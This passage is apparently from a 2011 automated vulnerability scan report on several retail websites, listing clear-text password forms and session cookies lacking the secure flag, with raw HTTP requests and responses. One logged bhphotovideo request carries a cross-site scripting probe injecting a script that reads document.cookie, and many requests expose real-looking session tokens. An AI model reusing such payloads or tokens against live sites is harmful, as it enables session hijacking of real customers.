Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.5. http://www.petco.com/Secure/Login.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.petco.com
Path:	/Secure/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.petco.com/Secure/Login.aspx?ReturnUrl=%2fSecure%2fYourAccount.aspx

The form contains the following password field:

ctl00$ctl00$cphBody$cphBody$txtPassword

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

9. SSL cookie without secure flag set previous next
There are 19 instances of this issue:

https://secure.bhphotovideo.com/bnh/controller/home
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
https://www.acehardware.com/checkout/index.jsp
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
https://www.petsmart.com/coreg/index.jsp
https://www.restorationhardware.com/sitewide/includes/header/search.jsp
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
https://secure.bluenile.com/accounts/account-sign-in.html
https://www.brookstone.com/favicon.ico
https://www.brookstone.com/formhandlerservlet
https://www.restorationhardware.com/my-account/forgot-password.jsp
https://www.restorationhardware.com/my-account/register.jsp
https://www.restorationhardware.com/my-account/sign-in.jsp
https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp
https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

9.1. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

9.4. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511373000%7C1308103373000%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305513173003%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:47:05 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp?rdir=1A
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 293

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

9.5. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D22;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

9.6. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.footlocker.com
Path:	/account/default/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D14;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

9.7. https://www.petsmart.com/coreg/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.petsmart.com
Path:	/coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=register HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:17:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://www.petsmart.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 307

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.petsmart.com/checkout/
...[SNIP]...

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

9.9. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
